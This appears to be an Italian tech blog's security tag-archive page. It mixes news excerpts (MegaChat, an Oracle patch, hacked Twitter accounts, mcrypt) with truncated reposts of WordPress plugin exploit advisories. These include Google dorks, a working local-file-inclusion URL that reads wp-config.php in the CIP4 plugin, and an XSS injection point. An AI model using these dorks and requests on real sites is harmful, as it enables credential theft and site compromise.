Tags archives: sicurezza

 

0

MegaChat valida alternativa a Hangout e Skype

Kim Dotcom ha annunciato il rilascio di MegaChat, nuovo servizio web che ci chiamate voip crittografate che punta ad offrire una valida alternativa a Google Hangout e Skype.

Quasi in concomitanza con l’arrivo di WhatsApp Web (per maggiori informazioni), arriva un’altro importante servizio web ossia MegaChat.
MegaChat è un servizio web che ci consente di effettuare chiamate e videochiamate gratuite all’interno del nostro browser, il tutto senza utilizzare plugin di terze parti o client dedicati. Una delle principali caratteristiche di MegaChat riguarda la sicurezza, difatti il servizio effettua chiamate crittografate grazie al protocollo denominato User Controlled Encryption (UCE), inoltre il servizio web ci consente di scambiare file tra utenti in modo sicuro (dato che anche questi verranno crittografati).

Continua a leggere…

 

0

Oracle releases 167 critical security fixes for Java and Sun systems

Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers. The pressing fixes involve several of Oracle’s most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score [...]

 

0

New York Post and UPI Twitter accounts hacked

The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news. In one post, the Pope was quoted on UPI’s Twitter feed as saying that “World War III has begun”. Meanwhile, the New York Post’s account said that hostilities had broken out [...]

 

0

WordPress CIP4 Folder Download 1.10 Local File Inclusion

# Exploit Title: CIP4 Folder Download Widget LFI # Google Dork: index of :/cip4-folder-download-widget # Date: 13-01-2015 # Exploit Author: Ben khlifa Fahmi (XTnR3v0lt) # Vendor Homepage: http://community.cip4.org # Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/ # Version: 1.10 # Tested on: Ubuntu 14.04   Dork : inurl:/wp-content/plugins/cip4-folder-download-widget/   Exploit : http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php   Ben khlifa Fahmi – Founder & [...]

 

0

mcrypt tool per cifrare e decifrare velocemente un file

Vi presentiamo mcrypt, un semplice tool open che ci consente di criptare o decriptare un file da riga di comando.

mcrypt in Ubuntu
In questi anni abbiamo presentato numerosi software e tool che ci consentono di mettere al sicuro i nostri file da occhi indiscreti. Tra le tante soluzioni disponibili presenti nei repository ufficiali delle principali distribuzioni Linux troviamo anche mcrypt, tool open source a riga di comando dalle caratteristiche davvero molto interessanti.
mcrypt ci consente di cifrare e decifrare velocemente un file direttamente da riga di comando con la possibilità di scegliere i più svariati algoritmi con diverse ed utili opzioni.

Continua a leggere…

 

0

WordPress Slideoptinprox Cross Site Scripting

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability | |[*] Google Dork: inurl:”/wp-content/plugins/slideoptinprox/” | |[*] Date : Date: 2015-01-08 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*]Vendor Homepage : https://pluginu.com/slideoptinprox/ | |[*] Tested on: Windows 8.1,Kali Linux | |————————————————————————-| | |[*] Location : [localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS] | |————————————————————————-| |[*] Proof: | [...]

 

0

WordPress Simple Security Plugin XSS vulnerabilities

Advisory ID: HTB23244 Product: Simple Security WordPress Plugin Vendor: MyWebsiteAdvisor Vulnerable Version(s): 1.1.5 and probably prior Tested Version: 1.1.5 Advisory Publication: December 17, 2014 [without technical details] Vendor Notification: December 17, 2014 Public Disclosure: January 14, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9570 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: [...]

 

0

WordPress WP Unique Article Header Image 1.0 CSRF / XSS

************************************************************************************** # Title: CSRF / Stored XSS Vulnerability in WP Unique Article Header Image Wordpress Plugin # Author: Manideep K # cve-id : CVE-2014-9400 # Plugin Homepage: https://wordpress.org/plugins/wp-unique-article-header-image/ # Version Affected: 1.0 (probably lower versions) # Severity: High   # Description: Vulnerable Parameter: gt_default_header and gt_homepage_header # Vulnerability Class: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))   [...]

 

0

WordPress WP Limit Posts Automatically 0.7 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in WP Limit Posts Automatically Wordpress Plugin # Author: Manideep K # cve-id: CVE-2014-9401 # Plugin Homepage: https://wordpress.org/plugins/wp-limit-posts-automatically/ # Version Affected: 0.7 (probably lower versions) # Severity: High   # Description: # Vulnerable Parameter: all text fields to name – lpa_post_letters # About Vulnerability: This plugin is vulnerable [...]

 

0

WordPress TweetScribe 1.1 CSRF / XSS

************************************************************************************** # Title: CSRF / Stored XSS Vulnerability in TweetScribe Wordpress Plugin # Author: Manideep K # CVE-ID: CVE-2014-9399 # Plugin Homepage: https://wordpress.org/plugins/tweetscribe/ # Version Affected: 1.1 (probably lower versions) # Severity: High   # Description: Vulnerable Parameter: tweetscribe_username Vulnerability Class: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))   # About Vulnerability: This plugin is vulnerable to [...]